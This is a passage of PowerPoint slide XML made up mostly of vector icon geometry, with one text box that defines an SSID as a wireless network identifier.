                    <a:pt x="188" y="132"/>
                    <a:pt x="188" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="132"/>
                    <a:pt x="176" y="127"/>
                    <a:pt x="176" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="72"/>
                    <a:pt x="176" y="72"/>
                    <a:pt x="176" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="65"/>
                    <a:pt x="181" y="60"/>
                    <a:pt x="188" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="60"/>
                    <a:pt x="212" y="60"/>
                    <a:pt x="212" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="60"/>
                    <a:pt x="224" y="65"/>
                    <a:pt x="224" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="120"/>
                    <a:pt x="224" y="120"/>
                    <a:pt x="224" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="127"/>
                    <a:pt x="219" y="132"/>
                    <a:pt x="212" y="132"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="188" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="5"/>
                    <a:pt x="193" y="0"/>
                    <a:pt x="200" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="0"/>
                    <a:pt x="212" y="5"/>
                    <a:pt x="212" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="48"/>
                    <a:pt x="212" y="48"/>
                    <a:pt x="212" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="48"/>
                    <a:pt x="188" y="48"/>
                    <a:pt x="188" y="48"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="188" y="12"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="124" y="196"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="196"/>
                    <a:pt x="100" y="196"/>
                    <a:pt x="100" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="196"/>
                    <a:pt x="88" y="191"/>
                    <a:pt x="88" y="184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29"/>
                    <a:pt x="93" y="124"/>
                    <a:pt x="100" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="124"/>
                    <a:pt x="124" y="124"/>
                    <a:pt x="124" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="124"/>
                    <a:pt x="136" y="129"/>
                    <a:pt x="136" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="184"/>
                    <a:pt x="136" y="184"/>
                    <a:pt x="136" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="191"/>
                    <a:pt x="131" y="196"/>
                    <a:pt x="124" y="196"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="100" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="5"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="0"/>
                    <a:pt x="124" y="5"/>
                    <a:pt x="124" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="112"/>
                    <a:pt x="124" y="112"/>
                    <a:pt x="124" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="112"/>
                    <a:pt x="100" y="112"/>
                    <a:pt x="100" y="112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="12"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="164"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="164"/>
                    <a:pt x="12" y="164"/>
                    <a:pt x="12" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="164"/>
                    <a:pt x="0" y="159"/>
                    <a:pt x="0" y="152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97"/>
                    <a:pt x="5" y="92"/>
                    <a:pt x="12" y="92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43" y="92"/>
                    <a:pt x="48" y="97"/>
                    <a:pt x="48" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="152"/>
                    <a:pt x="48" y="152"/>
                    <a:pt x="48" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="159"/>
                    <a:pt x="43" y="164"/>
                    <a:pt x="36" y="164"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="12" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="5"/>
                    <a:pt x="17" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="0"/>
                    <a:pt x="36" y="5"/>
                    <a:pt x="36" y="12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12" y="80"/>
                    <a:pt x="12" y="80"/>
                    <a:pt x="12" y="80"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12" y="12"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="244"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="251"/>
                    <a:pt x="31" y="256"/>
                    <a:pt x="24" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="256"/>
                    <a:pt x="12" y="251"/>
                    <a:pt x="12" y="24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36" y="176"/>
                    <a:pt x="36" y="176"/>
                    <a:pt x="36" y="176"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36" y="244"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="124" y="244"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="251"/>
                    <a:pt x="119" y="256"/>
                    <a:pt x="112" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="256"/>
                    <a:pt x="100" y="251"/>
                    <a:pt x="100" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="208"/>
                    <a:pt x="100" y="208"/>
                    <a:pt x="100" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="208"/>
                    <a:pt x="124" y="208"/>
                    <a:pt x="124" y="208"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="124" y="244"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="212" y="244"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="251"/>
                    <a:pt x="207" y="256"/>
                    <a:pt x="200" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="256"/>
                    <a:pt x="188" y="251"/>
                    <a:pt x="188" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="144"/>
                    <a:pt x="188" y="144"/>
                    <a:pt x="188" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="144"/>
                    <a:pt x="212" y="144"/>
                    <a:pt x="212" y="144"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="212" y="24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97010519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Freeform 269"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3819445" y="3383299"/>
            <a:ext cx="633483" cy="576790"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 994 w 1989"/>
              <a:gd name="T1" fmla="*/ 0 h 1812"/>
              <a:gd name="T2" fmla="*/ 994 w 1989"/>
              <a:gd name="T3" fmla="*/ 0 h 1812"/>
              <a:gd name="T4" fmla="*/ 354 w 1989"/>
              <a:gd name="T5" fmla="*/ 268 h 1812"/>
              <a:gd name="T6" fmla="*/ 354 w 1989"/>
              <a:gd name="T7" fmla="*/ 1548 h 1812"/>
              <a:gd name="T8" fmla="*/ 994 w 1989"/>
              <a:gd name="T9" fmla="*/ 1811 h 1812"/>
              <a:gd name="T10" fmla="*/ 1634 w 1989"/>
              <a:gd name="T11" fmla="*/ 1548 h 1812"/>
              <a:gd name="T12" fmla="*/ 1634 w 1989"/>
              <a:gd name="T13" fmla="*/ 268 h 1812"/>
              <a:gd name="T14" fmla="*/ 994 w 1989"/>
              <a:gd name="T15" fmla="*/ 0 h 1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89" h="1812">
                <a:moveTo>
                  <a:pt x="994" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="994" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="766" y="0"/>
                  <a:pt x="532" y="91"/>
                  <a:pt x="354" y="268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="622"/>
                  <a:pt x="0" y="1194"/>
                  <a:pt x="354" y="1548"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="532" y="1725"/>
                  <a:pt x="766" y="1811"/>
                  <a:pt x="994" y="1811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1229" y="1811"/>
                  <a:pt x="1457" y="1725"/>
                  <a:pt x="1634" y="1548"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1988" y="1194"/>
                  <a:pt x="1988" y="622"/>
                  <a:pt x="1634" y="268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1457" y="91"/>
                  <a:pt x="1229" y="0"/>
                  <a:pt x="994" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent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55" name="Freeform 270"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3789882" y="3348129"/>
            <a:ext cx="702462" cy="647130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1085 w 2206"/>
              <a:gd name="T1" fmla="*/ 2005 h 2035"/>
              <a:gd name="T2" fmla="*/ 1085 w 2206"/>
              <a:gd name="T3" fmla="*/ 2005 h 2035"/>
              <a:gd name="T4" fmla="*/ 383 w 2206"/>
              <a:gd name="T5" fmla="*/ 1714 h 2035"/>
              <a:gd name="T6" fmla="*/ 383 w 2206"/>
              <a:gd name="T7" fmla="*/ 314 h 2035"/>
              <a:gd name="T8" fmla="*/ 1085 w 2206"/>
              <a:gd name="T9" fmla="*/ 23 h 2035"/>
              <a:gd name="T10" fmla="*/ 1788 w 2206"/>
              <a:gd name="T11" fmla="*/ 314 h 2035"/>
              <a:gd name="T12" fmla="*/ 1788 w 2206"/>
              <a:gd name="T13" fmla="*/ 1714 h 2035"/>
              <a:gd name="T14" fmla="*/ 1085 w 2206"/>
              <a:gd name="T15" fmla="*/ 2005 h 2035"/>
              <a:gd name="T16" fmla="*/ 1085 w 2206"/>
              <a:gd name="T17" fmla="*/ 0 h 2035"/>
              <a:gd name="T18" fmla="*/ 1085 w 2206"/>
              <a:gd name="T19" fmla="*/ 0 h 2035"/>
              <a:gd name="T20" fmla="*/ 366 w 2206"/>
              <a:gd name="T21" fmla="*/ 297 h 2035"/>
              <a:gd name="T22" fmla="*/ 68 w 2206"/>
              <a:gd name="T23" fmla="*/ 1017 h 2035"/>
              <a:gd name="T24" fmla="*/ 366 w 2206"/>
              <a:gd name="T25" fmla="*/ 1737 h 2035"/>
              <a:gd name="T26" fmla="*/ 1085 w 2206"/>
              <a:gd name="T27" fmla="*/ 2034 h 2035"/>
              <a:gd name="T28" fmla="*/ 1085 w 2206"/>
              <a:gd name="T29" fmla="*/ 2034 h 2035"/>
              <a:gd name="T30" fmla="*/ 1805 w 2206"/>
              <a:gd name="T31" fmla="*/ 1737 h 2035"/>
              <a:gd name="T32" fmla="*/ 1805 w 2206"/>
              <a:gd name="T33" fmla="*/ 297 h 2035"/>
              <a:gd name="T34" fmla="*/ 1085 w 2206"/>
              <a:gd name="T35" fmla="*/ 0 h 2035"/>
              <a:gd name="T36" fmla="*/ 1085 w 2206"/>
              <a:gd name="T37" fmla="*/ 2005 h 20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206" h="2035">
                <a:moveTo>
                  <a:pt x="1085" y="2005"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1085" y="2005"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="823" y="2005"/>
                  <a:pt x="571" y="1902"/>
                  <a:pt x="383" y="1714"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1331"/>
                  <a:pt x="0" y="703"/>
                  <a:pt x="383" y="314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="571" y="126"/>
                  <a:pt x="823" y="23"/>
                  <a:pt x="1085" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1354" y="23"/>
                  <a:pt x="1600" y="126"/>
                  <a:pt x="1788" y="314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2177" y="703"/>
                  <a:pt x="2177" y="1331"/>
                  <a:pt x="1788" y="1714"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1600" y="1902"/>
                  <a:pt x="1354" y="2005"/>
                  <a:pt x="1085" y="2005"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1085" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="817" y="0"/>
                  <a:pt x="560" y="103"/>
                  <a:pt x="366" y="297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="486"/>
                  <a:pt x="68" y="743"/>
                  <a:pt x="68" y="1017"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="1285"/>
                  <a:pt x="177" y="1542"/>
                  <a:pt x="366" y="1737"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="560" y="1925"/>
                  <a:pt x="817" y="2034"/>
                  <a:pt x="1085" y="2034"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1085" y="2034"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1360" y="2034"/>
                  <a:pt x="1611" y="1925"/>
                  <a:pt x="1805" y="1737"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2205" y="1337"/>
                  <a:pt x="2205" y="691"/>
                  <a:pt x="1805" y="297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1611" y="103"/>
                  <a:pt x="1360" y="0"/>
                  <a:pt x="1085" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1085" y="2005"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent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40" name="Freeform 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4000957" y="3537755"/>
            <a:ext cx="266366" cy="266368"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 399 w 444"/>
              <a:gd name="T1" fmla="*/ 53 h 444"/>
              <a:gd name="T2" fmla="*/ 399 w 444"/>
              <a:gd name="T3" fmla="*/ 53 h 444"/>
              <a:gd name="T4" fmla="*/ 372 w 444"/>
              <a:gd name="T5" fmla="*/ 53 h 444"/>
              <a:gd name="T6" fmla="*/ 372 w 444"/>
              <a:gd name="T7" fmla="*/ 98 h 444"/>
              <a:gd name="T8" fmla="*/ 293 w 444"/>
              <a:gd name="T9" fmla="*/ 98 h 444"/>
              <a:gd name="T10" fmla="*/ 293 w 444"/>
              <a:gd name="T11" fmla="*/ 53 h 444"/>
              <a:gd name="T12" fmla="*/ 151 w 444"/>
              <a:gd name="T13" fmla="*/ 53 h 444"/>
              <a:gd name="T14" fmla="*/ 151 w 444"/>
              <a:gd name="T15" fmla="*/ 98 h 444"/>
              <a:gd name="T16" fmla="*/ 71 w 444"/>
              <a:gd name="T17" fmla="*/ 98 h 444"/>
              <a:gd name="T18" fmla="*/ 71 w 444"/>
              <a:gd name="T19" fmla="*/ 53 h 444"/>
              <a:gd name="T20" fmla="*/ 45 w 444"/>
              <a:gd name="T21" fmla="*/ 53 h 444"/>
              <a:gd name="T22" fmla="*/ 0 w 444"/>
              <a:gd name="T23" fmla="*/ 98 h 444"/>
              <a:gd name="T24" fmla="*/ 0 w 444"/>
              <a:gd name="T25" fmla="*/ 399 h 444"/>
              <a:gd name="T26" fmla="*/ 45 w 444"/>
              <a:gd name="T27" fmla="*/ 443 h 444"/>
              <a:gd name="T28" fmla="*/ 399 w 444"/>
              <a:gd name="T29" fmla="*/ 443 h 444"/>
              <a:gd name="T30" fmla="*/ 443 w 444"/>
              <a:gd name="T31" fmla="*/ 399 h 444"/>
              <a:gd name="T32" fmla="*/ 443 w 444"/>
              <a:gd name="T33" fmla="*/ 98 h 444"/>
              <a:gd name="T34" fmla="*/ 399 w 444"/>
              <a:gd name="T35" fmla="*/ 53 h 444"/>
              <a:gd name="T36" fmla="*/ 399 w 444"/>
              <a:gd name="T37" fmla="*/ 399 h 444"/>
              <a:gd name="T38" fmla="*/ 399 w 444"/>
              <a:gd name="T39" fmla="*/ 399 h 444"/>
              <a:gd name="T40" fmla="*/ 45 w 444"/>
              <a:gd name="T41" fmla="*/ 399 h 444"/>
              <a:gd name="T42" fmla="*/ 45 w 444"/>
              <a:gd name="T43" fmla="*/ 196 h 444"/>
              <a:gd name="T44" fmla="*/ 399 w 444"/>
              <a:gd name="T45" fmla="*/ 196 h 444"/>
              <a:gd name="T46" fmla="*/ 399 w 444"/>
              <a:gd name="T47" fmla="*/ 399 h 444"/>
              <a:gd name="T48" fmla="*/ 124 w 444"/>
              <a:gd name="T49" fmla="*/ 0 h 444"/>
              <a:gd name="T50" fmla="*/ 124 w 444"/>
              <a:gd name="T51" fmla="*/ 0 h 444"/>
              <a:gd name="T52" fmla="*/ 89 w 444"/>
              <a:gd name="T53" fmla="*/ 0 h 444"/>
              <a:gd name="T54" fmla="*/ 89 w 444"/>
              <a:gd name="T55" fmla="*/ 89 h 444"/>
              <a:gd name="T56" fmla="*/ 124 w 444"/>
              <a:gd name="T57" fmla="*/ 89 h 444"/>
              <a:gd name="T58" fmla="*/ 124 w 444"/>
              <a:gd name="T59" fmla="*/ 0 h 444"/>
              <a:gd name="T60" fmla="*/ 354 w 444"/>
              <a:gd name="T61" fmla="*/ 0 h 444"/>
              <a:gd name="T62" fmla="*/ 354 w 444"/>
              <a:gd name="T63" fmla="*/ 0 h 444"/>
              <a:gd name="T64" fmla="*/ 319 w 444"/>
              <a:gd name="T65" fmla="*/ 0 h 444"/>
              <a:gd name="T66" fmla="*/ 319 w 444"/>
              <a:gd name="T67" fmla="*/ 89 h 444"/>
              <a:gd name="T68" fmla="*/ 354 w 444"/>
              <a:gd name="T69" fmla="*/ 89 h 444"/>
              <a:gd name="T70" fmla="*/ 354 w 444"/>
              <a:gd name="T71" fmla="*/ 0 h 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44" h="444">
                <a:moveTo>
                  <a:pt x="399" y="53"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="399" y="53"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="53"/>
                  <a:pt x="372" y="53"/>
                  <a:pt x="372" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="98"/>
                  <a:pt x="372" y="98"/>
                  <a:pt x="372" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="98"/>
                  <a:pt x="293" y="98"/>
                  <a:pt x="293" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="53"/>
                  <a:pt x="293" y="53"/>
                  <a:pt x="293" y="53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151" y="98"/>
                  <a:pt x="151" y="98"/>
                  <a:pt x="151" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="98"/>
                  <a:pt x="71" y="98"/>
                  <a:pt x="71" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="53"/>
                  <a:pt x="71" y="53"/>
                  <a:pt x="71" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="53"/>
                  <a:pt x="45" y="53"/>
                  <a:pt x="45" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="53"/>
                  <a:pt x="0" y="71"/>
                  <a:pt x="0" y="98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5"/>
                  <a:pt x="18" y="443"/>
                  <a:pt x="45" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="443"/>
                  <a:pt x="399" y="443"/>
                  <a:pt x="399" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="425" y="443"/>
                  <a:pt x="443" y="425"/>
                  <a:pt x="443" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="443" y="98"/>
                  <a:pt x="443" y="98"/>
                  <a:pt x="443" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="443" y="71"/>
                  <a:pt x="425" y="53"/>
                  <a:pt x="399" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="399" y="399"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="399" y="399"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="399"/>
                  <a:pt x="45" y="399"/>
                  <a:pt x="45" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="196"/>
                  <a:pt x="45" y="196"/>
                  <a:pt x="45" y="196"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="196"/>
                  <a:pt x="399" y="196"/>
                  <a:pt x="399" y="196"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="399" y="399"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="124" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="124" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="0"/>
                  <a:pt x="89" y="0"/>
                  <a:pt x="89" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="89"/>
                  <a:pt x="89" y="89"/>
                  <a:pt x="89" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="89"/>
                  <a:pt x="124" y="89"/>
                  <a:pt x="124" y="89"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="124" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="354" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="354" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="0"/>
                  <a:pt x="319" y="0"/>
                  <a:pt x="319" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="89"/>
                  <a:pt x="319" y="89"/>
                  <a:pt x="319" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="354" y="89"/>
                  <a:pt x="354" y="89"/>
                  <a:pt x="354" y="89"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35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2980732" y="3345777"/>
            <a:ext cx="710415" cy="369314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</a:rPr>
              <a:t>SSID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92944" y="3684641"/>
            <a:ext cx="3303381" cy="909718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="109710" tIns="54855" rIns="109710" bIns="54855" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="914217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MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>A unique identifier of 32 alphanumeric characters given to a wireless local area network (WLAN)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="81" name="Group 80"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7662768" y="3339962"/>
            <a:ext cx="702462" cy="647130"/>
            <a:chOff x="13296064" y="10607541"/>
            <a:chExt cx="1265763" cy="1166060"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83" name="Freeform 269"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13349333" y="10670914"/>
              <a:ext cx="1141470" cy="1039314"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 994 w 1989"/>
                <a:gd name="T1" fmla="*/ 0 h 1812"/>
                <a:gd name="T2" fmla="*/ 994 w 1989"/>
                <a:gd name="T3" fmla="*/ 0 h 1812"/>
                <a:gd name="T4" fmla="*/ 354 w 1989"/>
                <a:gd name="T5" fmla="*/ 268 h 1812"/>
                <a:gd name="T6" fmla="*/ 354 w 1989"/>
                <a:gd name="T7" fmla="*/ 1548 h 1812"/>
                <a:gd name="T8" fmla="*/ 994 w 1989"/>
                <a:gd name="T9" fmla="*/ 1811 h 1812"/>
                <a:gd name="T10" fmla="*/ 1634 w 1989"/>
                <a:gd name="T11" fmla="*/ 1548 h 1812"/>
                <a:gd name="T12" fmla="*/ 1634 w 1989"/>
                <a:gd name="T13" fmla="*/ 268 h 1812"/>
                <a:gd name="T14" fmla="*/ 994 w 1989"/>
                <a:gd name="T15" fmla="*/ 0 h 1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89" h="1812">
                  <a:moveTo>
                    <a:pt x="994" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="994" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="766" y="0"/>
                    <a:pt x="532" y="91"/>
                    <a:pt x="354" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="622"/>
                    <a:pt x="0" y="1194"/>
                    <a:pt x="354" y="1548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="532" y="1725"/>
                    <a:pt x="766" y="1811"/>
                    <a:pt x="994" y="1811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="1811"/>
                    <a:pt x="1457" y="1725"/>
                    <a:pt x="1634" y="1548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1988" y="1194"/>
                    <a:pt x="1988" y="622"/>
                    <a:pt x="1634" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1457" y="91"/>
                    <a:pt x="1229" y="0"/>
                    <a:pt x="994" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/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4" name="Freeform 270"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13296064" y="10607541"/>
              <a:ext cx="1265763" cy="1166060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1085 w 2206"/>
                <a:gd name="T1" fmla="*/ 2005 h 2035"/>
                <a:gd name="T2" fmla="*/ 1085 w 2206"/>
                <a:gd name="T3" fmla="*/ 2005 h 2035"/>
                <a:gd name="T4" fmla="*/ 383 w 2206"/>
                <a:gd name="T5" fmla="*/ 1714 h 2035"/>
                <a:gd name="T6" fmla="*/ 383 w 2206"/>
                <a:gd name="T7" fmla="*/ 314 h 2035"/>
                <a:gd name="T8" fmla="*/ 1085 w 2206"/>
                <a:gd name="T9" fmla="*/ 23 h 2035"/>
                <a:gd name="T10" fmla="*/ 1788 w 2206"/>
                <a:gd name="T11" fmla="*/ 314 h 2035"/>
                <a:gd name="T12" fmla="*/ 1788 w 2206"/>
                <a:gd name="T13" fmla="*/ 1714 h 2035"/>
                <a:gd name="T14" fmla="*/ 1085 w 2206"/>
